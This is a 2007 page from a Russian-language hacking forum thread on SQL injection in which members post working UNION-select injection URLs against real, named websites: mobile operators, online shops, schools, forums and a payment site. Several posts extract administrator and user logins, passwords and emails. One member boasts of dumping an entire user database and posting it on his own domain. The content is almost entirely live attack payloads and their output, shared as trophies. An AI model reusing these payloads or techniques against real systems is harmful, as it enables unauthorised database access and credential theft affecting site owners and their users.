SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    MTS украина (вап)

    http://wap.buffer.mts.com.ua/ custom_cards/mtswap/show.php? type=xh tml&lang=ru&id=-14470+union+select+1,2,concat(version(),0x3a,user(),0x3a,database( )),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*



    инет-магазин


    код:


    http://www.alo-alo.ru/news.phtml?t=3&idn=-23+union+select+1,concat(column_name,char(58),table_name),3,4+from+information_schema.columns/*
     
    #3081 sasTO, 13 Sep 2007
    Last edited: 13 Sep 2007
    1 person likes this.
  2. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    3 хостинга, 4 версия :'(
     
    1 person likes this.
  3. lsass.exe

    lsass.exe Elder - Старейшина

    Joined:
    5 Aug 2007
    Messages:
    156
    Likes Received:
    161
    Reputations:
    24
    http://radiorecord.ru/news/?id=-1+union+select+1,database(),3,version()/*

    http://tikhvin.spb.ru/view.php?bn=a_articles&key=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,userid,17,password,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+a_users/*&for=
     
    2 people like this.
  4. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    WAP.MOBILNIK.UA


    код:


    http://wap.mobilnik.ua/news.php?act=full&id=-12168%27+union+select+1,concat(pass,char(58),email,char(58),name),3,4,5,6,7,8,9,10+from+sub_user+limit+46,1/*

    please,help! как раскрутить такую скулю?

    код:
    http://www.copris.com/pinboard/cgi-bin/nameanon_r.idc?Canonce=1'
     
    1 person likes this.
  5. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.alalbany.ws/search/view.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5/*  albws_albws@localhost:4.1.22-standard:albws_albwsch
    Code:
    http://www.eitan.ws/publicaciones/ver_publicaciones.php?id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database())/*  [email protected]:5.0.22-max:eitan
     
    2 people like this.
  6. lsass.exe

    lsass.exe Elder - Старейшина

    Joined:
    5 Aug 2007
    Messages:
    156
    Likes Received:
    161
    Reputations:
    24
    http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,email,6,password,password,9,10,login,12+from+users+limit+2,6/*

    Также написал парсер и вытянул всю базу
    http://lsass.us/uptime.ru.txt
     
    1 person likes this.
  7. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Интернет магазин цифровой техники

    Интернет магазин цифровой техники =\
    Code:
    htp://cyfra. com.ua/options?id= 9999+union+se lect+1,concat(user(),0x3a,version(),0x3a,database())/*
    cyfra@localhost:5.0.24a-Debian_9-log:cyfra
     
  8. I0gen

    I0gen Elder - Старейшина

    Joined:
    15 Aug 2007
    Messages:
    76
    Likes Received:
    33
    Reputations:
    10
    http://www.teachandtic.es/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.rosanemello.pro.br/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.inovar.pt/cre/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.cfpa.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.maiaexperimental.net/webquests/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.manuelfariasousa.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.projectos.esffl.pt/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.ebivc.org/webquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.api.adm.br/phpwebquest_2_international/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.capag.info/wq/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario

    http://www.cf-terras-feira.org/phpwebquest/webquest/soporte_derecha_w.php?id_actividad=-1%20union%20select%201,1,1,1,concat(usuario,0x3a,password,0x3a,e_mail)%20from%20usuario
     
    2 people like this.
  9. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    _http://www.vanta.ru/script/catalog.php?cat=-1%20union%20select%201,USER()/*
     
    1 person likes this.
  10. AdReNa1!Ne

    AdReNa1!Ne Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    70
    Likes Received:
    105
    Reputations:
    14
    POST http://smspaymer.com:80/index.php HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
    Host: smspaymer.com
    Content-Length: 121
    Cookie: reg_num=160517
    Connection: Close
    Pragma: no-cache

    step=1&my_country=[sql_inj]&[email protected]&my_phone=79260001144&nextstep=%CF%F0%EE%E4%EE%EB%E6%E8%F2%FC

    Инъекция через POST запрос
     
    2 people like this.
  11. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.whathaseuropedone.org.uk/topic_detail.php?topic_id=-13+union+select+1,VERSION(),3,4,5,6,7,8,9,10,11,12+from+partners/*
    Code:
    http://hyipcredit.com/forum/topic_detail.php?id=-2%20UNION%20SELECT%201,2,3,admin_password,5,username,7,8%20From%20admin/*
    Code:
    http://www.monetary-code.com/forum/topic_detail.php?id=-92%20UNION%20SELECT%201,2,3,admin_password,5,username,7,8%20From%20admin/*
    Code:
    http://www.afsnetworks.com/news.php?id=-70+union+select+1,2,concat(id,0x3a,username,0x3a,passwd),4,5,6,7,8,9,10,11,12+from+users/*
     
    #3091 SWAT, 15 Sep 2007
    Last edited: 15 Sep 2007
    1 person likes this.
  12. SkyMan

    SkyMan New Member

    Joined:
    3 Dec 2006
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    http://kinosbornik.ru/search.php?sort=zhanr&zhanrid=1'
     
  13. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://kinosbornik.ru/search.php?sort=zhanr&zhanrid=-1+union+select+table_name+from+INFORMATION_SCHEMA.TABLES/*
     
    1 person likes this.
  14. c001er*

    c001er* Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    20
    Likes Received:
    18
    Reputations:
    0
    http://www.gnarlsbarkley.com/cms/news/news_view_comments_list.php?id=38+limit+0+union+select+1,777,1,1,1,1/*

    http://www.casino-games-internet.com/it/guida.php?ID=527+limit+0+union+select+1,1,version(),1222,1444,1,1,1,1,1,1/*
     
    #3094 c001er*, 16 Sep 2007
    Last edited: 16 Sep 2007
    1 person likes this.
  15. _GaLs_

    _GaLs_ Elder - Старейшина

    Joined:
    21 Apr 2006
    Messages:
    431
    Likes Received:
    252
    Reputations:
    48
    Code:
    http://www.basketball.ru/netcat/modules/user/profile.php?userid=-1+union+select+1,2,3,,5,Version(),7,8/*
    Code:
    http://cidoc.ics.forth.gr/issues.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10/*
     
    2 people like this.
  16. c001er*

    c001er* Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    20
    Likes Received:
    18
    Reputations:
    0
    HTML:
    http://www.toumaz.com/news/news.php?id=26+limit+0+union+select+1,1,2,2,3,user()/*
     
    1 person likes this.
  17. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://www.tmf.ukim.[COLOR=Sienna]edu.mk[/COLOR]/subview2.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),4/*
    http://www.tmf.ukim.edu.mk/mjcce/default.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),5,6,7,8,9,10,11,12,13,14/*&start=0
    Code:
    http://shqip-toplevel.schools.[COLOR=Sienna]edu.mk[/COLOR]/dynamicpage.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(VERSION(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),12,13/*
     
  18. Helios

    Helios Elder - Старейшина

    Joined:
    14 Jan 2007
    Messages:
    414
    Likes Received:
    180
    Reputations:
    103
    http://mebelsm.ru/index.php?sect=cat&catid=64&prod_id=-1+union+select+1,2,3,4,5,user(),7,8,9/*

    Там есть еще, но ковыряться не было времени
     
    1 person likes this.
  19. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Code:
    http://www.btb.cc/adetail.php?id=-881+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
     
    2 people like this.
  20. z01b

    z01b Муджахид

    Joined:
    5 Jan 2007
    Messages:
    494
    Likes Received:
    382
    Reputations:
    22
    http://www.energyagency.org.uk/news.php?id=-1+union+select+0,1,2,3,4,5/*
    http://www.impact.org/news.php?id=-1+union+select+0,1,2,3,user(),5,version(),7
     
    #3100 z01b, 16 Sep 2007
    Last edited: 16 Sep 2007
Thread Status:
Not open for further replies.